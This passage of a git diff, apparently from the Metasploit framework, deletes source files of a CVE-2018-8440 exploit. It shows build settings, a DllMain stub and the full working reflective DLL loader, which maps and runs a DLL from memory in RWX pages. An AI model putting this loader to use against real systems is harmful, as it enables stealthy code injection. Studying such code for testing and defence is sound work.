WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions) - true - EnableFastChecks - MultiThreadedDebugDLL - - Level3 - EditAndContinue - ../common - - - true - Windows - MachineX86 - - - - - Disabled - WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions) - true - EnableFastChecks - MultiThreadedDebugDLL - - - Level3 - EditAndContinue - ../common - - - true - Windows - - - - - X64 - - - Disabled - WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions) - true - EnableFastChecks - MultiThreadedDebugDLL - - Level3 - ProgramDatabase - ../common - - - true - Windows - MachineX64 - - - - - MaxSpeed - OnlyExplicitInline - true - WIN32;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions) - MultiThreaded - true - - Level3 - ProgramDatabase - ../common - - - true - Windows - true - true - MachineX86 - - - - - MinSpace - OnlyExplicitInline - true - WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_ARM;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions) - MultiThreaded - true - - - Level3 - true - Default - ProgramDatabase - ../common - - - true - Windows - true - true - $(OutDir)$(ProjectName).arm.dll - - - - - X64 - - - MaxSpeed - OnlyExplicitInline - true - Size - false - WIN64;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;_WIN64;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions) - MultiThreaded - true - - Level3 - ProgramDatabase - ../common - CompileAsCpp - - - $(OutDir)$(ProjectName).x64.dll - true - Windows - true - true - MachineX64 - - - - - - \ No newline at end of file diff --git a/external/source/exploits/CVE-2018-8440/dll/reflective_dll.vcxproj.filters b/external/source/exploits/CVE-2018-8440/dll/reflective_dll.vcxproj.filters deleted file mode 100755 index cb1ffcf101..0000000000 --- a/external/source/exploits/CVE-2018-8440/dll/reflective_dll.vcxproj.filters +++ /dev/null @@ -1,53 +0,0 @@ - - - - - {4FC737F1-C7A5-4376-A066-2A32D752A2FF} - cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx - - - {93995380-89BD-4b04-88EB-625FBE52EBFB} - h;hpp;hxx;hm;inl;inc;xsd - - - - - Header Files - - - Header Files - - - Header Files - - - Header Files - - - Header Files - - - Header Files - - - Header Files - - - - - Source Files - - - Source Files - - - Source Files - - - Source Files - - - Source Files - - - \ No newline at end of file diff --git a/external/source/exploits/CVE-2018-8440/dll/src/ReflectiveDll.c b/external/source/exploits/CVE-2018-8440/dll/src/ReflectiveDll.c deleted file mode 100755 index df1f8eca33..0000000000 --- a/external/source/exploits/CVE-2018-8440/dll/src/ReflectiveDll.c +++ /dev/null @@ -1,35 +0,0 @@ -//===============================================================================================// -// This is a stub for the actuall functionality of the DLL. -//===============================================================================================// -#include "ReflectiveLoader.h" -#include "exploit.h" - -// Note: REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR and REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN are -// defined in the project properties (Properties->C++->Preprocessor) so as we can specify our own -// DllMain and use the LoadRemoteLibraryR() API to inject this DLL. - -// You can use this value as a pseudo hinstDLL value (defined and set via ReflectiveLoader.c) -extern HINSTANCE hAppInstance; -//===============================================================================================// -BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved ) -{ - BOOL bReturnValue = TRUE; - switch( dwReason ) - { - case DLL_QUERY_HMODULE: - if( lpReserved != NULL ) - *(HMODULE *)lpReserved = hAppInstance; - break; - case DLL_PROCESS_ATTACH: - hAppInstance = hinstDLL; - MessageBoxA( NULL, "Hello from DllMain!", "Reflective Dll Injection", MB_OK ); - testFunc(); - //RunIt((void*)hAppInstance); - break; - case DLL_PROCESS_DETACH: - case DLL_THREAD_ATTACH: - case DLL_THREAD_DETACH: - break; - } - return bReturnValue; -} \ No newline at end of file diff --git a/external/source/exploits/CVE-2018-8440/dll/src/ReflectiveLoader.c b/external/source/exploits/CVE-2018-8440/dll/src/ReflectiveLoader.c deleted file mode 100755 index 9bdd9b97f6..0000000000 --- a/external/source/exploits/CVE-2018-8440/dll/src/ReflectiveLoader.c +++ /dev/null @@ -1,598 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2013, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. -//===============================================================================================// -#include "ReflectiveLoader.h" -//===============================================================================================// -// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value -HINSTANCE hAppInstance = NULL; -//===============================================================================================// -#pragma intrinsic( _ReturnAddress ) -// This function can not be inlined by the compiler or we will not get the address we expect. Ideally -// this code will be compiled with the /O2 and /Ob1 switches. Bonus points if we could take advantage of -// RIP relative addressing in this instance but I dont believe we can do so with the compiler intrinsics -// available (and no inline asm available under x64). -__declspec(noinline) ULONG_PTR caller( VOID ) { return (ULONG_PTR)_ReturnAddress(); } -//===============================================================================================// -#ifdef ENABLE_OUTPUTDEBUGSTRING -#define OUTPUTDBG(str) pOutputDebug((LPCSTR)str) -#else /* ENABLE_OUTPUTDEBUGSTRING */ -#define OUTPUTDBG(str) do{}while(0) -#endif - -// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN, -// otherwise the DllMain at the end of this file will be used. - -// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR, -// otherwise it is assumed you are calling the ReflectiveLoader via a stub. - -// This is our position independent reflective DLL loader/injector -#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR -DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( LPVOID lpParameter ) -#else -DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( VOID ) -#endif -{ - // the functions we need - LOADLIBRARYA pLoadLibraryA = NULL; - GETPROCADDRESS pGetProcAddress = NULL; - VIRTUALALLOC pVirtualAlloc = NULL; - NTFLUSHINSTRUCTIONCACHE pNtFlushInstructionCache = NULL; -#ifdef ENABLE_STOPPAGING - VIRTUALLOCK pVirtualLock = NULL; -#endif -#ifdef ENABLE_OUTPUTDEBUGSTRING - OUTPUTDEBUG pOutputDebug = NULL; -#endif - - USHORT usCounter; - - // the initial location of this image in memory - ULONG_PTR uiLibraryAddress; - // the kernels base address and later this images newly loaded base address - ULONG_PTR uiBaseAddress; - - // variables for processing the kernels export table - ULONG_PTR uiAddressArray; - ULONG_PTR uiNameArray; - ULONG_PTR uiExportDir; - ULONG_PTR uiNameOrdinals; - DWORD dwHashValue; - - // variables for loading this image - ULONG_PTR uiHeaderValue; - ULONG_PTR uiValueA; - ULONG_PTR uiValueB; - ULONG_PTR uiValueC; - ULONG_PTR uiValueD; - ULONG_PTR uiValueE; - - // STEP 0: calculate our images current base address - - // we will start searching backwards from our callers return address. - uiLibraryAddress = caller(); - - // loop through memory backwards searching for our images base address - // we dont need SEH style search as we shouldnt generate any access violations with this - while( TRUE ) - { - if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE ) - { - uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; - // some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'), - // we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems. - if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 ) - { - uiHeaderValue += uiLibraryAddress; - // break if we have found a valid MZ/PE header - if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE ) - break; - } - } - uiLibraryAddress--; - } - - // STEP 1: process the kernels exports for the functions our loader needs... - - // get the Process Enviroment Block -#ifdef _WIN64 - uiBaseAddress = __readgsqword( 0x60 ); -#else -#ifdef WIN_ARM - uiBaseAddress = *(DWORD *)( (BYTE *)_MoveFromCoprocessor( 15, 0, 13, 0, 2 ) + 0x30 ); -#else _WIN32 - uiBaseAddress = __readfsdword( 0x30 ); -#endif -#endif - - // get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx - uiBaseAddress = (ULONG_PTR)((_PPEB)uiBaseAddress)->pLdr; - - // get the first entry of the InMemoryOrder module list - uiValueA = (ULONG_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink; - while( uiValueA ) - { - // get pointer to current modules name (unicode string) - uiValueB = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer; - // set bCounter to the length for the loop - usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length; - // clear uiValueC which will store the hash of the module name - uiValueC = 0; - - // compute the hash of the module name... - do - { - uiValueC = ror( (DWORD)uiValueC ); - // normalize to uppercase if the module name is in lowercase - if( *((BYTE *)uiValueB) >= 'a' ) - uiValueC += *((BYTE *)uiValueB) - 0x20; - else - uiValueC += *((BYTE *)uiValueB); - uiValueB++; - } while( --usCounter ); - - // compare the hash with that of kernel32.dll - if( (DWORD)uiValueC == KERNEL32DLL_HASH ) - { - // get this modules base address - uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase; - - // get the VA of the modules NT Header - uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew; - - // uiNameArray = the address of the modules export directory entry - uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the VA of the export directory - uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress ); - - // get the VA for the array of name pointers - uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames ); - - // get the VA for the array of name ordinals - uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals ); - - usCounter = 3; -#ifdef ENABLE_STOPPAGING - usCounter++; -#endif -#ifdef ENABLE_OUTPUTDEBUGSTRING - usCounter++; -#endif - - // loop while we still have imports to find - while( usCounter > 0 ) - { - // compute the hash values for this function name - dwHashValue = _hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) ); - - // if we have found a function we want we get its virtual address - if( dwHashValue == LOADLIBRARYA_HASH - || dwHashValue == GETPROCADDRESS_HASH - || dwHashValue == VIRTUALALLOC_HASH -#ifdef ENABLE_STOPPAGING - || dwHashValue == VIRTUALLOCK_HASH -#endif -#ifdef ENABLE_OUTPUTDEBUGSTRING - || dwHashValue == OUTPUTDEBUG_HASH -#endif - ) - { - // get the VA for the array of addresses - uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions ); - - // use this functions name ordinal as an index into the array of name pointers - uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) ); - - // store this functions VA - if( dwHashValue == LOADLIBRARYA_HASH ) - pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) ); - else if( dwHashValue == GETPROCADDRESS_HASH ) - pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) ); - else if( dwHashValue == VIRTUALALLOC_HASH ) - pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) ); -#ifdef ENABLE_STOPPAGING - else if( dwHashValue == VIRTUALLOCK_HASH ) - pVirtualLock = (VIRTUALLOCK)( uiBaseAddress + DEREF_32( uiAddressArray ) ); -#endif -#ifdef ENABLE_OUTPUTDEBUGSTRING - else if( dwHashValue == OUTPUTDEBUG_HASH ) - pOutputDebug = (OUTPUTDEBUG)( uiBaseAddress + DEREF_32( uiAddressArray ) ); -#endif - - // decrement our counter - usCounter--; - } - - // get the next exported function name - uiNameArray += sizeof(DWORD); - - // get the next exported function name ordinal - uiNameOrdinals += sizeof(WORD); - } - } - else if( (DWORD)uiValueC == NTDLLDLL_HASH ) - { - // get this modules base address - uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase; - - // get the VA of the modules NT Header - uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew; - - // uiNameArray = the address of the modules export directory entry - uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the VA of the export directory - uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress ); - - // get the VA for the array of name pointers - uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames ); - - // get the VA for the array of name ordinals - uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals ); - - usCounter = 1; - - // loop while we still have imports to find - while( usCounter > 0 ) - { - // compute the hash values for this function name - dwHashValue = _hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) ); - - // if we have found a function we want we get its virtual address - if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH ) - { - // get the VA for the array of addresses - uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions ); - - // use this functions name ordinal as an index into the array of name pointers - uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) ); - - // store this functions VA - if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH ) - pNtFlushInstructionCache = (NTFLUSHINSTRUCTIONCACHE)( uiBaseAddress + DEREF_32( uiAddressArray ) ); - - // decrement our counter - usCounter--; - } - - // get the next exported function name - uiNameArray += sizeof(DWORD); - - // get the next exported function name ordinal - uiNameOrdinals += sizeof(WORD); - } - } - - // we stop searching when we have found everything we need. - if( pLoadLibraryA - && pGetProcAddress - && pVirtualAlloc -#ifdef ENABLE_STOPPAGING - && pVirtualLock -#endif - && pNtFlushInstructionCache -#ifdef ENABLE_OUTPUTDEBUGSTRING - && pOutputDebug -#endif - ) - break; - - // get the next entry - uiValueA = DEREF( uiValueA ); - } - - // STEP 2: load our image into a new permanent location in memory... - - // get the VA of the NT Header for the PE to be loaded - uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; - - // allocate all the memory for the DLL to be loaded into. we can load at any address because we will - // relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems. - uiBaseAddress = (ULONG_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE ); - -#ifdef ENABLE_STOPPAGING - // prevent our image from being swapped to the pagefile - pVirtualLock((LPVOID)uiBaseAddress, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage); -#endif - - // we must now copy over the headers - uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders; - uiValueB = uiLibraryAddress; - uiValueC = uiBaseAddress; - - while( uiValueA-- ) - *(BYTE *)uiValueC++ = *(BYTE *)uiValueB++; - - // STEP 3: load in all of our sections... - - // uiValueA = the VA of the first section - uiValueA = ( (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader ); - - // itterate through all sections, loading them into memory. - uiValueE = ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections; - while( uiValueE-- ) - { - // uiValueB is the VA for this section - uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress ); - - // uiValueC if the VA for this sections data - uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData ); - - // copy the section over - uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData; - - while( uiValueD-- ) - *(BYTE *)uiValueB++ = *(BYTE *)uiValueC++; - - // get the VA of the next section - uiValueA += sizeof( IMAGE_SECTION_HEADER ); - } - - // STEP 4: process our images import table... - - // uiValueB = the address of the import directory - uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ]; - - // we assume there is an import table to process - // uiValueC is the first entry in the import table - uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress ); - - // iterate through all imports until a null RVA is found (Characteristics is mis-named) - while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Characteristics ) - { - OUTPUTDBG("Loading library: "); - OUTPUTDBG((LPCSTR)(uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name)); - OUTPUTDBG("\n"); - - // use LoadLibraryA to load the imported module into memory - uiLibraryAddress = (ULONG_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) ); - - if ( !uiLibraryAddress ) - { - OUTPUTDBG("Loading library FAILED\n"); - - uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR ); - continue; - } - - // uiValueD = VA of the OriginalFirstThunk - uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk ); - - // uiValueA = VA of the IAT (via first thunk not origionalfirstthunk) - uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk ); - - // itterate through all imported functions, importing by ordinal if no name present - while( DEREF(uiValueA) ) - { - // sanity check uiValueD as some compilers only import by FirstThunk - if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG ) - { - // get the VA of the modules NT Header - uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; - - // uiNameArray = the address of the modules export directory entry - uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the VA of the export directory - uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress ); - - // get the VA for the array of addresses - uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions ); - - // use the import ordinal (- export ordinal base) as an index into the array of addresses - uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) ); - - // patch in the address for this imported function - DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) ); - } - else - { - // get the VA of this functions import by name struct - uiValueB = ( uiBaseAddress + DEREF(uiValueA) ); - - OUTPUTDBG("Resolving function: "); - OUTPUTDBG(((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name); - OUTPUTDBG("\n"); - - // use GetProcAddress and patch in the address for this imported function - DEREF(uiValueA) = (ULONG_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name ); - } - // get the next imported function - uiValueA += sizeof( ULONG_PTR ); - if( uiValueD ) - uiValueD += sizeof( ULONG_PTR ); - } - - // get the next import - uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR ); - } - - // STEP 5: process all of our images relocations... - - // calculate the base address delta and perform relocations (even if we load at desired image base) - uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase; - - // uiValueB = the address of the relocation directory - uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ]; - - // check if their are any relocations present - if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size ) - { - // uiValueC is now the first entry (IMAGE_BASE_RELOCATION) - uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress ); - - // and we itterate through all entries... - while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock ) - { - // uiValueA = the VA for this relocation block - uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress ); - - // uiValueB = number of entries in this relocation block - uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC ); - - // uiValueD is now the first entry in the current relocation block - uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION); - - // we itterate through all the entries in the current block... - while( uiValueB-- ) - { - // perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required. - // we dont use a switch statement to avoid the compiler building a jump table - // which would not be very position independent! - if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 ) - *(ULONG_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress; - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW ) - *(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress; -#ifdef WIN_ARM - // Note: On ARM, the compiler optimization /O2 seems to introduce an off by one issue, possibly a code gen bug. Using /O1 instead avoids this problem. - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_ARM_MOV32T ) - { - register DWORD dwInstruction; - register DWORD dwAddress; - register WORD wImm; - // get the MOV.T instructions DWORD value (We add 4 to the offset to go past the first MOV.W which handles the low word) - dwInstruction = *(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) ); - // flip the words to get the instruction as expected - dwInstruction = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) ); - // sanity chack we are processing a MOV instruction... - if( (dwInstruction & ARM_MOV_MASK) == ARM_MOVT ) - { - // pull out the encoded 16bit value (the high portion of the address-to-relocate) - wImm = (WORD)( dwInstruction & 0x000000FF); - wImm |= (WORD)((dwInstruction & 0x00007000) >> 4); - wImm |= (WORD)((dwInstruction & 0x04000000) >> 15); - wImm |= (WORD)((dwInstruction & 0x000F0000) >> 4); - // apply the relocation to the target address - dwAddress = ( (WORD)HIWORD(uiLibraryAddress) + wImm ) & 0xFFFF; - // now create a new instruction with the same opcode and register param. - dwInstruction = (DWORD)( dwInstruction & ARM_MOV_MASK2 ); - // patch in the relocated address... - dwInstruction |= (DWORD)(dwAddress & 0x00FF); - dwInstruction |= (DWORD)(dwAddress & 0x0700) << 4; - dwInstruction |= (DWORD)(dwAddress & 0x0800) << 15; - dwInstruction |= (DWORD)(dwAddress & 0xF000) << 4; - // now flip the instructions words and patch back into the code... - *(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) ) = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) ); - } - } -#endif - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH ) - *(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress); - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW ) - *(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress); - - // get the next entry in the current relocation block - uiValueD += sizeof( IMAGE_RELOC ); - } - - // get the next entry in the relocation directory - uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock; - } - } - - // STEP 6: call our images entry point - - // uiValueA = the VA of our newly loaded DLL/EXE's entry point - uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint ); - - OUTPUTDBG("Flushing the instruction cache"); - // We must flush the instruction cache to avoid stale code being used which was updated by our relocation processing. - pNtFlushInstructionCache( (HANDLE)-1, NULL, 0 ); - - // call our respective entry point, fudging our hInstance value -#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR - // if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter) - ((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter ); -#else - // if we are injecting an DLL via a stub we call DllMain with no parameter - ((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL ); -#endif - - // STEP 8: return our new entry point address so whatever called us can call DllMain() if needed. - return uiValueA; -} -//===============================================================================================// -#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN - -// you must implement this function... -extern DWORD DLLEXPORT Init( SOCKET socket ); - -BOOL MetasploitDllAttach( SOCKET socket ) -{ - Init( socket ); - return TRUE; -} - -BOOL MetasploitDllDetach( DWORD dwExitFunc ) -{ - switch( dwExitFunc ) - { - case EXITFUNC_SEH: - SetUnhandledExceptionFilter( NULL ); - break; - case EXITFUNC_THREAD: - ExitThread( 0 ); - break; - case EXITFUNC_PROCESS: - ExitProcess( 0 ); - break; - default: - break; - } - - return TRUE; -} - -BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved ) -{ - BOOL bReturnValue = TRUE; - - switch( dwReason ) - { - case DLL_METASPLOIT_ATTACH: - bReturnValue = MetasploitDllAttach( (SOCKET)lpReserved ); - break; - case DLL_METASPLOIT_DETACH: - bReturnValue = MetasploitDllDetach( (DWORD)lpReserved ); - break; - case DLL_QUERY_HMODULE: - if( lpReserved != NULL ) - *(HMODULE *)lpReserved = hAppInstance; - break; - case DLL_PROCESS_ATTACH: - hAppInstance = hinstDLL; - break; - case DLL_PROCESS_DETACH: - case DLL_THREAD_ATTACH: - case DLL_THREAD_DETACH: - break; - } - return bReturnValue; -} - -#endif -//===============================================================================================// diff --git a/external/source/exploits/CVE-2018-8440/dll/src/ReflectiveLoader.h b/external/source/exploits/CVE-2018-8440/dll/src/ReflectiveLoader.h deleted file mode 100755 index 9ea6d601ac..0000000000 --- a/external/source/exploits/CVE-2018-8440/dll/src/ReflectiveLoader.h +++ /dev/null @@ -1,223 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2013, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY 